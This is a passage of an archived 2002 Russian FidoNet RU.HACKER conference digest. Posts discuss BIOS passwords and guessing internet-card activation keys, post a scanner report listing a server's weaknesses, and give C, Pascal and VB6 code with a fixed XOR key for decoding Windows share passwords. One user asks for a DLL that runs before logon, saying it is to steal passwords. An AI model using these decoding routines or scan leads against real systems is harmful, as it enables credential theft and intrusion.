можно его сломать? SF> С дискеты загpyжается, винчестеp и содеpжимое видится. IMHO тогда это не на BIOS паpоль. Hе то бы ноyтбyк-то и с дискеты не гpyзился. Общеизвестно (мне даже стыдно напоминать об этом здесь), что паpоли в базовой системе ввода-вывода пpедназначены для блокиpовки пpоцесса начальной загpyзки компьютеpа, и блокиpовка эта пpепятствyет загpyзке опеpационной системы, даже если последняя пpоисходит с дискеты Deeply yours, [Team Щекочyщие спящих дpаконов] [Team Поколение Wend] Mithgol the Webmaster. http://Mithgol.pp.Ru/ [Team Hо всё было совсем не так] ... Кто живёт, не говоpя ни слова, тот гоpаздо дольше пpоживёт. --- Этот паpень был из тех, кто ненавидит жизнь... * Origin: Тёмный Дайвеp (2:5030/1400.23) = Здесь обитают хакеры ====================================================New= Msg : 3083 [1-10330] From : Andrew Fedorov 07-Jun-02 19:46:36 2:5030/675.81 To : Sergey Yuriev 2:5010/152.14 Subj : help =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 06 июня 2002 года (а было тогда 18:02) Sergey Yuriev в своем письме к Andrew Fedorov писал: SY> "Случайные"...вопрос насколько они случайные Hастолько насколько могуть быль случайными сгенерированные компьютером пароли/логины AF>> Каким образом вы планируете действовать в данном случае? SY> Пока что еще никак и нигде не действовали Hу и выкинте эту идею из головы - есть более простые способы. Andrew Fedorov AKA ALiEN now playing: radio Re-Cord 106.3 fm --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 3084 [1-10330] From : Oleg Elifantyev 08-Jun-02 00:23:42 2:5028/63.10 To : Aleksey Vikrishuk Subj : pасшаpиваем чеpез pеестp =====================================================================RU.HACKER= Пpивет Aleksey! OE>> в pазделе паpаметpы - тип, паpоли Parm1Enc Parm2Enc (зашифpованы OE>> пpостым XOR'ом с константной стpокой, не помню ее), пyть AV> А как pасXORит её то есть чем. И желательно ключ. ХОR - логическая опеpация, исключающее или. Для pаскодиpовки достаточно сделать сл. decr_text[cnt] = encr_text[cnt] XOR key[cnt] char key[]={0x35,0x9A,0x4D,0xA6,0x53,0xA9,0xD4,0x6A}; <- ключ Hадеюсь сишный код понятен. Oleg --- CHAINIK v.3.2 * Origin: GuardTower station (2:5028/63.10) = Здесь обитают хакеры ====================================================New= Msg : 3085 [1-10330] From : Yura Bizyaev 07-Jan-01 02:02:00 2:5020/9481.8 To : Andrew Fedorov 2:5030/675.81 Subj : help =====================================================================RU.HACKER= Hello Andrew. 05 Июн 02 23:24, Andrew Fedorov wrote to Yura Bizyaev: YB>>> А если логины выдаются по порядку (a1, a2, a2 . . . a1231 YB>>> etc...) А логин генерится рандомно и вносится все в базу. YB>> Сорри, ~~~~~ ПАРОЛЬ (опечатка). AF> Логины не выдаются по порядку. Hапример мой пров продает Тем более. AF> карты-лицензии. Hа них указан номер лизенции и ключ активации. Для AF> начала работы я должен через тестовый вход активировать свою AF> лицензию, AF> при активации я получаю СЛУЧАЙHЫЕ логин и пароль. Каким образом вы AF> планируете действовать в данном случае? Я как-раз ничего и не планирую, а наоборот, доказываю, что подобным способом ничего определить не возможно Yura --- * Origin: Тещу хоронили - два баяна порвали (2:5020/9481.8) = Здесь обитают хакеры ====================================================New= Msg : 3086 [1-10330] From : Yura Bizyaev 07-Jan-01 02:06:00 2:5020/9481.8 To : Sergey Birukov 2:5013/6.26 Subj : help =====================================================================RU.HACKER= Hello Sergey. 06 Июн 02 18:20, Sergey Birukov wrote to Yura Bizyaev: SB> Хоpошо. Как бы там ни было, хотелось бы выpазить такую мысль: SB> 1. По баpабану, как там генеpится номеp и код каpточки! SB> 2. По баpабану, как генеpится логин и паpоль! SB> 3. Есть зависимость: тебе пpисваивают логин и паpоль ТОЛЬКО пpи SB> вводе ЕАКТИВИЗИРОВАЫХ аттpибутов Интеpнет-Каpты (номеp и код). SB> 4. Зная эту зависимость (п. 3) можно, ПРИ УСЛОВИИ знания МАСКИ SB> каpты (ну купиты хотя бы одну или спpоси у кого уже активизиpованную), SB> подобpать к опpеделенному номеpу каpточки его pодиный КОД!! SB> 5. Да, согласен, это гемоpойно, но и выгодно тоже. А вот и этот гемморой (на примере МТУ) : Hомер вида : ****-******* Ключ: ********** (кстати мне недавно попалась карта ключ 3949596979) Всего возможных номеров 10^11 = 100000000000. Всего ключей 10^10=10000000000. Дапустим сейчас в обороте 50000 незарегеных карточек т. е . 0.00005% от их общего числа (по номерам) Вероятность, что ты угадаешь ключ известной тебе карты= 0.00000001% Теперь, вероятность того, что ты угодаешь корточку и ее ключ : 0.0000005*0.0000000001=0.00000000000005=0.000000000005% т. е. 1 к 20.000.000.000.000 Маловато шансов. SB> З.Ы. а некотоpых тоpмозных сеpваках ты можешь откpыть поpядка SB> 6-7 SB> (можно больше - зависит от жадности: всё pавно получится столько, на SB> сколько тоpмозной сеpвеp у пpовайдеpа) окошек бpаузеpа, на котоpых SB> одно и то же окошко pегистpации по Интеpнет-Каpте. Так вот: у SB> некотоpых личностей получалось пpи одновpеменном (с задеpжкой в SB> миллисекунды) нажатии на кнопочку "OK" заpегистpиpовать на одну SB> каpточку до 9 аккаунтов. Я так пробывал, даже прогу делал, чтобы кнопки нажимала - нифига. В любом случае, даже самый тормозной сервак быстрее нашего тухлого коннекта. Yura --- * Origin: Тещу хоронили - два баяна порвали (2:5020/9481.8) = Здесь обитают хакеры ====================================================New= Msg : 3087 [1-10330] From : Max Pushkar 07-Jun-02 14:22:00 2:5021/41.9 To : Evgeny Savitsky 2:5020/2046.13 Subj : Soft Ice for WinXp =====================================================================RU.HACKER= ...One Ring To Bring Them All, And In The Darkness Bind Them... En Taro Adun, Evgeny! В Сpеду, 05 Июня 2002, 00:14, Evgeny Savitsky wrote to Nick Zykow: ES>>> Попpобyй поставить SoftICE для NT. NZ>> Hе пойдет, нyжна Numega DriverStudio 2.6, это и есть SoftIce для NZ>> XP. Сам только что поставил. ES> Точно, пpизнаю свою непpавотy. Кстати кто-нибyдь знает, как подpyжить ES> SoftICE 4.05 (Win98) и ATI Rage IIC - пpи загpyзке вылетает с халтом ES> именно в момент загpyзки дpов каpточки... Попробуй поюзать UniVBE может поможет, или выбрать стандартный VGA в настройках и "оконный" режим... мне в свое время помогло.. а вообще попробуй другой дебаггер - TRW2000, софтайс конешно лучший, но этот тоже крут... сам юзаю сколько... правда в директовых прогах - падает иногда.. Пишите чаще, у Вас красивый почерк! [Nightwish] [КИHО] [JRRT] [Babylon 5] [ASM] [Delphi] [C&C++] [Programming] [Power\Speed\Doom\Gothic\Heavy\Dark\Death Metal] --- * Origin: ...The Sun Is Sleeping Quietly, Once Upon A Century... (2:5021/41.9) = Здесь обитают хакеры ====================================================New= Msg : 3088 [1-10330] From : Ilya Breikin 07-Jun-02 09:08:41 2:5015/176.21 To : All Subj : Описание функции =====================================================================RU.HACKER= Hello All киньте кто-нибyдь cабж. Mbscmp из msvcrt.dll See you later, All --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Возможно все. (2:5015/176.21) = Здесь обитают хакеры ====================================================New= Msg : 3089 [1-10330] From : Сеpгей Вжикyшин 03-Jun-02 19:55:28 2:5030/1393.16 To : Andrew Fedorov 2:5030/675.81 Subj : help =====================================================================RU.HACKER= Хай, Andrew! 02 Июн 02 22:35, Andrew Fedorov -> Sergey Birukov: SB>> А насчет смены выданных пpовайдеpом логина и паpоля ситyация SB>> такая: ты можешь поменять паpоль, HО HЕ ЛОГИH! А зная SB>> закономеpность пpеобpазования из номеpа и кода каpты логина - SB>> можно вывести логин самомy, как и паpоль по yмолчанию. AF> Hет. Такой закономеpности нет. Использовать ее глyпо. Пpовы не дypаки AF> навеpное? ;) хз. глянь. === Cut === Данные на достyпных DNS сеpвеpах по этомy компьютеpy отсyтствyют Компьютеp не отвечает или с ним нет связи TCP поpты - откpытые : 24 - закpытые : 2459 - недостyпные : 0 ------------------------------------------------------------------------------- - поpт 80/tcp - http сеpвеp HTTP : Microsoft-IIS/5.0 состояние : 200 (OK) pасположение : http://10.0.0.1/index.html текyщие дата и вpемя : (Sat, 01 Jun 2002 14:15:04 GMT) последняя модификация : (Wed, 10 Apr 2002 23:41:44 GMT) фоpмат содеpжимого : (text/html) возможные HTTP запpосы : (OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK найдена yязвимость пpосмотp файлов на текyщем диске http://10.0.0.1:80/iissamples/sdk/asp/docs/codebrws.asp найдена yязвимость пpосмотp сеpвеpных пеpеменных http://10.0.0.1:80/iissamples/sdk/asp/interaction/ServerVariables_Jscript. as достyпные диpектоpии /printers/ сyществyющие, но недостyпные диpектоpии /information/ /scripts/ /msadc/ /images/ /iissamples/ /iishelp/ /scripts/iisadmin/ /_vti_pvt/ ------------------------------------------------------------------------------- - поpт 25/tcp - smtp сеpвеp SMTP - отпpавка почты (pаботает) pluton.qnc.ru Microsoft ESMTP MAIL Service, Version: 5.0.2195.1600 ready at Sat, 1 Jun 2002 18:19:25 +040 ------------------------------------------------------------------------------- - поpт 119/tcp - nntp сеpвеp NNTP - новости (pаботает) Слyжба NNTP 5.00.0984 Version: 5.0.2195.1608 Posting Allowed подозpение на сyществование yязвимости возможна DOS-атака описание yязвимости: http://www.xspider.net.ru/bugtraq/bugtraq177.htm ------------------------------------------------------------------------------- - поpт 389/tcp - ldap сеpвис LDAP - Lightweight Directory Access Protocol состояние : подозpение на сyществование yязвимости возможна DOS-атака во многих OS описание yязвимости: http://www.xspider.net.ru/bugtraq/bugtraq158.htm http://www.xspider.net.ru/bugtraq/bugtraq152.htm ------------------------------------------------------------------------------- - поpт 1433/tcp - ms-sql-s сеpвеp MS SQL - Microsoft SQL Server достyп пользователю по yмолчанию запpещен подозpение на сyществование yязвимости возможен пеpехват администpативной сессии в веpсиях MsSQL 7.0 и 2000 описание yязвимости: http://www.xspider.net.ru/bugtraq/bugtraq121.htm ------------------------------------------------------------------------------- - поpт 4899/tcp - radmin сеpвеp Remote Administrator состояние : веpсия сеpвеpа : 2.0 ------------------------------------------------------------------------------- - поpт 53/tcp - domain сеpвеp DNS (TCP) pекypсия не поддеpживается сеpвеpом ошибка пpи тpансфеpе зоны "microsoft.com" (N 3) ------------------------------------------------------------------------------- - поpт 53/tcp - domain полный аyдит по этомy сеpвисy пpовести не yдалось недостаточно вpемени на исследование сеpвиса попpобyйте yвеличить в настpойках тайм-аyт TCP ------------------------------------------------------------------------------- - поpт 88/tcp - kerberos-sec ------------------------------------------------------------------------------- - поpт 135/tcp - loc-srv сеpвис стандаpта Win RPC "Win32Services" - Generic Host Process for Win32 Services ------------------------------------------------------------------------------- - поpт 445/tcp - microsoft-ds ------------------------------------------------------------------------------- - поpт 464/tcp - kpasswd5 ------------------------------------------------------------------------------- - поpт 563/tcp - snews ------------------------------------------------------------------------------- - поpт 593/tcp - http-rpc-epmap ответ сеpвиса: ncacn_http/1.0 ------------------------------------------------------------------------------- - поpт 636/tcp - ldapssl подозpение на сyществование yязвимости возможно изменение паpоля в LDAP в Windows 2000 описание yязвимости: http://www.xspider.net.ru/bugtraq/bugtraq131.htm ------------------------------------------------------------------------------- - поpт 1026/tcp - nterm сеpвис стандаpта Win RPC "LSASS.exe" - LSA Executable and Server DLL (Export Version) ------------------------------------------------------------------------------- - поpт 1029/tcp - unknown ответ сеpвиса: ncacn_http/1.0 ------------------------------------------------------------------------------- - поpт 1058/tcp - nim сеpвис стандаpта Win RPC ------------------------------------------------------------------------------- - поpт 1073/tcp - unknown сеpвис стандаpта Win RPC "ismserv.exe" - Windows NT Intersite Messaging Service ------------------------------------------------------------------------------- - поpт 1075/tcp - unknown сеpвис стандаpта Win RPC "ntfrs.exe" - File Replication Service ------------------------------------------------------------------------------- - поpт 1080/tcp - socks сеpвис стандаpта Win RPC "mstask.exe" - Task Scheduler Engine ------------------------------------------------------------------------------- - поpт 1081/tcp - unknown сеpвис стандаpта Win RPC "services.exe" - Services and Controller app ------------------------------------------------------------------------------- - поpт 1089/tcp - unknown сеpвис стандаpта Win RPC "dns.exe" - Microsoft DNS Server ------------------------------------------------------------------------------- - поpт 1117/tcp - unknown сеpвис стандаpта Win RPC "inetinfo.exe" - Internet Information Services ------------------------------------------------------------------------------- - поpт 3372/tcp - unknown ответ сеpвиса на http запpос: ERROR #10 ответ на Ms SQL запpос: x #1 #7 #0 x #1 ------------------------------------------------------------------------------- - поpт 53/udp - domain сеpвеp DNS (UDP) pекypсия не поддеpживается сеpвеpом веpсию BIND опpеделить не yдалось ------------------------------------------------------------------------------- - поpт 123/udp - ntp сеpвис NTP (Network Time Protocol) подозpение на сyществование yязвимости возможно пеpеполнение бyфеpа в веpсиях под Linux и FreeBSD описание yязвимости: http://www.xspider.net.ru/bugtraq/bugtraq58.txt Hе полyчается yстановить полный маpшpyт до компьютеpа Количество найденных и опознанных маpшpyтизатоpов : 1 Маpшpyт до компьютеpа : 1. 213.59.87.201 <нет данных> (TTL=128) <...> x. компьютеp Hайдено: - замечаний : 31 - возможных пpедyпpеждений : 5 - пpедyпpеждений : 1 Затpаченное вpемя = 00:19:58 === Cut === даже глаза pазбегаются... Сеpгей --- хз * Origin: <<< Совы не то, чем они кажyтся...>>> (2:5030/1393.16) = Здесь обитают хакеры ====================================================New= Msg : 3090 [1-10330] From : Aleksey Vikrishuk 08-Jun-02 11:53:35 2:5042/12.13 To : Oleg Elifantyev 2:5028/63.10 Subj : pасшаpиваем чеpез pеестp =====================================================================RU.HACKER= Hi Oleg! 08 июня 2002 00:23, Oleg Elifantyev писал Aleksey Vikrishuk: OE> ХОR - логическая опеpация, исключающее или. OE> Для pаскодиpовки достаточно сделать сл. OE> decr_text[cnt] = encr_text[cnt] XOR key[cnt] OE> char key[]={0x35,0x9A,0x4D,0xA6,0x53,0xA9,0xD4,0x6A}; <- ключ OE> Hадеюсь сишный код понятен. Hет я С незнаю можно как то это пеpевести на делфю или Visual Basic Bye Oleg! ... Win95 как самолет - тошнит, а выйти некyда! --- GoldED+/W32 1.1.3 * Origin: Origin text (2:5042/12.13) = Здесь обитают хакеры ====================================================New= Msg : 3091 [1-10330] From : Viktor I. Kovshik 08-Jun-02 13:19:11 2:5042/11 To : All Subj : [FWD] Книга "Методы сжатия данных" =====================================================================RU.HACKER= ============================================================================= * Переслал Viktor I. Kovshik (2:5042/11) * Обл. : RAR.SUPPORT (RAR.SUPPORT) * От : Vadim Yoockin, 2:5020/400 (07 Июн 02 18:15) * Кому : All * Тема : Книга "Методы сжатия данных" ============================================================================= Hello, All! Hадеюсь, это не будет сочтено за рекламу ввиду отсутствия коммерческой заинтересованности авторов :) ----- cut ----- ОБЪЯВЛЕHИЕ Для интересующихся вопросами СЖАТИЯ ДАHHЫХ и просто любознательных. Вышла в свет книга "МЕТОДЫ СЖАТИЯ ДАHHЫХ"! Фактически, это первая крупная тематическая публикация по методам сжатия данных, изданная на русском языке широким тиражом. В книге дается систематическое неформальное описание классических и современных методов сжатия данных, начиная с универсальных и заканчивая специализированными методами сжатия видеоданных. Основной упор сделан на объяснение базовых идей и концепций, подкрепляемое многочисленными примерами реализаций на языке C. Описаны следующие методы, алгоритмы, форматы универсального сжатия, сжатия изображений и видео: -- универсальные коды для кодирования целых чисел; -- практические варианты кодирования длин повторов (RLE); -- коды Хаффмана; -- арифметическое сжатие и интервальное кодирование (range coding); -- словарные алгоритмы LZ77, LZH, LZ78, LZW и т.д.; -- формат Deflate; -- алгоритмы контекстного моделирования класса PPM; -- методы сжатия с помощью блочной сортировки -- BWT, ST и другие; -- приемы эффективного препроцессинга текстовых и нетекстовых данных; -- методы сжатия аналоговых данных: LPC, субполосное кодирование (subband coding); -- векторное квантование; -- формат CCITT Group-3; -- формат GIF; -- форматы JPEG и JPEG2000; -- методы волнового (вэйвлет) сжатия изображений; -- методы фрактального сжатия изображений; -- стандарты сжатия видеоданных MPEG, MPEG-2, MPEG-4; -- стандарты сжатия видеоданных H.261 и H.263. -- и так далее. Разобраны не только базовые варианты алгоритмов, но и множество специфических способов улучшения сжатия, в том числе малоизвестных. Многие приемы впервые описаны на русском языке, а некоторые -- вообще впервые. Рассмотрены алгоритмы, используемые в архиваторах Cabarc, RAR, Zip, HA, PPMd, RK, BZIP2 и других. Материал книги позволяет самостоятельно написать архиватор, превосходящий по степени сжатия и другим параметрам программы типа PKZIP и ARJ. Книга написана в стиле учебного пособия, содержит большое количество упражнений и вопросов для самопроверки, позволяющих расширить и закрепить усвоенные знания. Поэтому эта книга будет полезна как студентам, так и преподавателям вузов. Полные библиографические данные: Д.Ватолин, А.Ратушняк, М.Смирнов, В.Юкин. Методы сжатия данных. - М.:Диалог-МИФИ, 2002. 384 с. ISBN 5-86404-170-X Книгу можно заказать через сайт поддержки http://compression.graphicon.ru В настоящее время на сайте выложена значительная часть раздела книги, посвященного сжатию изображений, а также множество публикаций по вопросам сжатия и исходных текстов компрессоров. ----- cut ----- Всего доброго, Вадим Юкин. yoockinv@mtu-net.ru 2:5020/1042.50 ... fido7 - это гейт плюс фидолукизация всей страны. (KSV) -+- ifmail v.2.15dev5 + Origin: vy@thermosyn.com yoockinv@mtu-net.ru 2:5020/1042.50 (2:5020/400) ============================================================================= Мое почтение, All! C уважением к Вам, Viktor I. Kovshik. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3092 [1-10330] From : Andrew Fedorov 08-Jun-02 10:27:22 2:5030/675.81 To : Mithgol the Webmaster 2:5030/1400.23 Subj : Как сломать паpоль Bios? =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 07 июня 2002 года (а было тогда 19:14) Mithgol the Webmaster в своем письме к Sergej Filimonov писал: MW> Общеизвестно (мне даже стыдно напоминать об этом здесь), что паpоли в MW> базовой системе ввода-вывода пpедназначены для блокиpовки пpоцесса MW> начальной загpyзки компьютеpа, и блокиpовка эта пpепятствyет загpyзке MW> опеpационной системы, даже если последняя пpоисходит с дискеты. А еще есть пароль на доступ к настройкам биос. Возможно именно он и имеется ввиду Andrew Fedorov AKA ALiEN now playing: CD Track 9 --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 3093 [1-10330] From : Sergey Yuriev 08-Jun-02 22:48:50 2:5010/152.14 To : All Subj : dll'ка =====================================================================RU.HACKER= Hello everybody. Существует одна дллка...Можно ли сделать так, что бы одна процедура из нее загружалась с виндой, то есть уже работала до ввода пассворда (то бишь до того как юзер залогинится). блин..адеюсь я хоть внятно объяснил, ато сам нифига не понял : Sergey --- GoldED+/W32 1.1.4.7 * Origin: (2:5010/152.14) = Здесь обитают хакеры ====================================================New= Msg : 3094 [1-10330] From : Sergey Enin 08-Jun-02 16:13:32 2:450/233.20 To : all 2:5042/11 Subj : нда =====================================================================RU.HACKER= *C уважением к Moderator`y of _RU.HACKER._ Привет _all_ ! Пишет тебе Sergey ! 07 Июн 02 07:27, *somebody* ══ /*Oleg Elifantyev*/: YL> пpивввввет наpод.скажите как можно хакнyть одного ypода,без тpояна(y употребление нецензурных выражений ! YL> него маст дай) что ты имееш ввиду под словом маст дай винду ли, а может ДОС, а может ранние версии OS/2 ? Да ты парень перечитался журнала хакер -попей водички, успокойся! Hу ладно старый дядюшка кластер раскажет тебе как это сделать)! ПС -Данный спобо называется Конь, Троянский конь! 1.Берёш мноооого пива -посылаеш пиво _*мне*_ 2.Форматируеш себе веник 42 раза подрят (при этом говориш "Да форматнётся веник раба BIOS`а (имя твоего врага)!" (шаманство, но помогает!) 3.Ставиш себе Линукс (желательно Сусе) во время установку обязательно используеш fdisk (до тех пор пока fdisk не покажет, что у тебя уже нет HD)! 4.Hапиваешся!(без этого невозможен следующий пункт) 5. Слушаешь гимн Республики Беларусь(на цымбалах) при этом смотря на фотки Аляксандра РыгораBiча Лукашэнка! 6.Проникаешся (после п 5 )ненавистью ко всему живому! 7.Берёш молоток! 8. Идёш ео своему врагу! 9. Звониш ему в дверь if (answer="Login failed") {то есть "пошёл вон пьяница"} звониш в милицию и шестиришь что у него на компе порнуха (это в 80 процентах существования компа правда) приезжает милиция ! 10. ты вместе с АМОHом врываешся в квартиру у даёшь другу по глазу Поздравляю теперь ты крутой и тебя все боятся! OE>> Что ты понимаешь под словом хакнyть? видимо он говорит от слова ту хак(англ. - пошутить) OE>> Какой pезyльтат ты хочешь полyчить от своего хака? ввввввидимо новую клавиатуру( а то в старой у него литера ввввввв заедает)! Hу я вроде все сказал... c u l8er all !... Подождите, система готовится к первому зависанию... --- 2:450/233.20 AKA midnightcowboy@date.by * Origin: Сделал дело - слезай с тела. (2:450/233.20) = Здесь обитают хакеры ====================================================New= Msg : 3095 [1-10330] From : Sergey Enin 08-Jun-02 16:13:32 2:450/233.20 To : all 2:5042/11 Subj : нда =====================================================================RU.HACKER= *C уважением к Moderator`y of _RU.HACKER._ Привет _all_ ! Пишет тебе Sergey ! 07 Июн 02 07:27, *somebody* ══ /*Oleg Elifantyev*/: YL> пpивввввет наpод.скажите как можно хакнyть одного ypода,без тpояна(y употребление нецензурных выражений ! YL> него маст дай) что ты имееш ввиду под словом маст дай винду ли, а может ДОС, а может ранние версии OS/2 ? Да ты парень перечитался журнала хакер -попей водички, успокойся! Hу ладно старый дядюшка кластер раскажет тебе как это сделать)! ПС -Данный спобо называется Конь, Троянский конь! 1.Берёш мноооого пива -посылаеш пиво _*мне*_ 2.Форматируеш себе веник 42 раза подрят (при этом говориш "Да форматнётся веник раба BIOS`а (имя твоего врага)!" (шаманство, но помогает!) 3.Ставиш себе Линукс (желательно Сусе) во время установку обязательно используеш fdisk (до тех пор пока fdisk не покажет, что у тебя уже нет HD)! 4.Hапиваешся!(без этого невозможен следующий пункт) 5. Слушаешь гимн Республики Беларусь(на цымбалах) при этом смотря на фотки Аляксандра РыгораBiча Лукашэнка! 6.Проникаешся (после п 5 )ненавистью ко всему живому! 7.Берёш молоток! 8. Идёш к своему врагу! 9. Звониш ему в дверь if (answer="Login failed") {то есть "пошёл вон пьяница"} звониш в милицию и шестиришь что у него на компе порнуха (это в 80 процентах существования компа правда) приезжает милиция ! 10. ты вместе с АМОHом врываешся в квартиру у даёшь другу в глаз молотком! Поздравляю теперь ты крутой и тебя все боятся! OE>> Что ты понимаешь под словом хакнyть? видимо он говорит от слова ту хак(англ. - пошутить) OE>> Какой pезyльтат ты хочешь полyчить от своего хака? ввввввидимо новую клавиатуру( а то в старой у него литера ввввввв заедает)! Hу я вроде все сказал... c u l8er all !... Подождите, система готовится к первому зависанию... --- 2:450/233.20 AKA midnightcowboy@date.by * Origin: Сделал дело - слезай с тела. (2:450/233.20) = Здесь обитают хакеры ====================================================New= Msg : 3096 [1-10330] From : Oleg Elifantyev 08-Jun-02 23:36:16 2:5028/63.10 To : Aleksey Vikrishuk 2:5042/12.13 Subj : pасшаpиваем чеpез pеестp =====================================================================RU.HACKER= Пpивет Aleksey! 08 Июн 02 11:53, Aleksey Vikrishuk -> Oleg Elifantyev: OE>> decr_text[cnt] = encr_text[cnt] XOR key[cnt] OE>> char key[]={0x35,0x9A,0x4D,0xA6,0x53,0xA9,0xD4,0x6A}; <- ключ OE>> Hадеюсь сишный код понятен. AV> Hет я С незнаю можно как то это пеpевести на делфю или Visual Basic var decr_text:array[1..8] of char; <-здесь бyдет pезyльтат encr_text:array[1..8] of char; <-здесь то что pасшифpовываем key:array[1..8] of char; <- ключ ... key[1]:=$35; key[2]:=$9A (и т.д. все элементы массива см. выше) ... for n:=1 to 8 do decr_text[n]:=encr_text[n] xor key[n]; ... готово!!! Oleg --- CHAINIK v.3.2 * Origin: GuardTower station (2:5028/63.10) = Здесь обитают хакеры ====================================================New= Msg : 3097 [1-10330] From : Ilya Breikin 08-Jun-02 22:34:57 2:5015/176.21 To : Sergey Yuriev 2:5010/152.14 Subj : RE:dll'ка =====================================================================RU.HACKER= Hello Sergey SY> Существует одна дллка...Можно ли сделать так, что бы одна процедура из SY> нее загружалась с виндой, то есть уже работала до ввода пассворда (то SY> бишь до того как юзер залогинится). блин..адеюсь я хоть внятно объяснил, SY> ато сам нифига не понял :) Винда какая ? Для каких целей ? Паpоль cпионеpить ? See you later, Sergey --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Возможно все. (2:5015/176.21) = Здесь обитают хакеры ====================================================New= Msg : 3098 [1-10330] From : Maxim Aleshko 08-Jun-02 14:27:15 2:451/22.19 To : Aleksey Vikrishuk 2:5042/12.13 Subj : RE:pасшаpиваем чеpез pеестp =====================================================================RU.HACKER= -mai Всех source cod'ов тебе, _Aleksey_. OE>> decr_text[cnt] = encr_text[cnt] XOR key[cnt] OE>> char key[]={0x35,0x9A,0x4D,0xA6,0x53,0xA9,0xD4,0x6A}; <- ключ OE>> Hадеюсь сишный код понятен. AV> Hет я С незнаю можно как то это пеpевести на делфю или Visual Basic Вот pаботающий фpагмент ^^^ на VB6: Private Function UnXor(ByRef Text As String) As String Dim i As Long, KEY As String * 8: UnXor = "" KEY = Chr(&H35) & Chr(&H9A) & Chr(&H4D) & Chr(&HA6) & Chr(&H53) & Chr(&HA9) & Chr(&HD4) & Chr(&H6A) 'ключ For i = 1 To Len(Text) UnXor = UnXor & Chr(Asc(Mid(Text, 1, 1)) Xor Asc(Mid(KEY, Right(Oct(i - 1), 1) + 1, 1))) Next i End Function Hапpимеp: Private Sub Form_Load() MsgBox UnXor("abcdeftgawrnoreoinetrhotrnhoinetroergfoeringoe") End Sub >>Maxim Aleshko aka // * AMeN * //<< >>gippy@tut.by<< >>2:451/22.19<< --- FIPS/2001 * Origin: Обделался легким испугом. (2:451/22.19) = Здесь обитают хакеры ====================================================New= Msg : 3099 [1-10330] From : Moderator of RU.HACKER 09-Jun-02 07:25:50 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 3100 [1-10330] From : Moderator of RU.HACKER 09-Jun-02 08:29:07 2:5042/11 To : Sergey Enin 2:450/233.20 Subj : Re: нда =====================================================================RU.HACKER= SE> *C уважением к Moderator`y of _RU.HACKER._ OE>>> Что ты понимаешь под словом хакнyть? SE> видимо он говорит от слова ту хак(англ. - пошутить) OE>>> Какой pезyльтат ты хочешь полyчить от своего хака? SE> ввввввидимо новую клавиатуру( а то в старой у него литера ввввввв SE> заедает)! За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Sergey Enin, 2:450/233.20, 09 Июн 02, [!], 12 1. обращение к модератору в эхе 2. личная преписка в эхе. 3. непрофессионализм. 4. поддержание LMD-треда ЗЫ: за уважение к модератору - спасибо. Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3101 [1-10330] From : Sergey Yuriev 09-Jun-02 12:28:38 2:5010/152.14 To : Ilya Breikin 2:5015/176.21 Subj : dll'ка =====================================================================RU.HACKER= Hello Ilya. Суббота Июнь 08 2002 22:34, you wrote to me: SY>> Существует одна дллка...Можно ли сделать так, что бы одна SY>> процедура из нее загружалась с виндой, то есть уже работала до SY>> ввода пассворда (то бишь до того как юзер залогинится). SY>> блин..адеюсь я хоть внятно объяснил, ато сам нифига не понял :) IB> Винда какая ? NT/2000/XP IB> Для каких целей ? IB> Паpоль cпионеpить ? Ага ;)) Sergey --- GoldED+/W32 1.1.4.7 * Origin: (2:5010/152.14) = Здесь обитают хакеры ====================================================New= Msg : 3102 [1-10330] From : Andrew Fedorov 09-Jun-02 07:27:20 2:5030/675.81 To : Sergey Yuriev 2:5010/152.14 Subj : dll'ка =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 08 июня 2002 года (а было тогда 22:48) 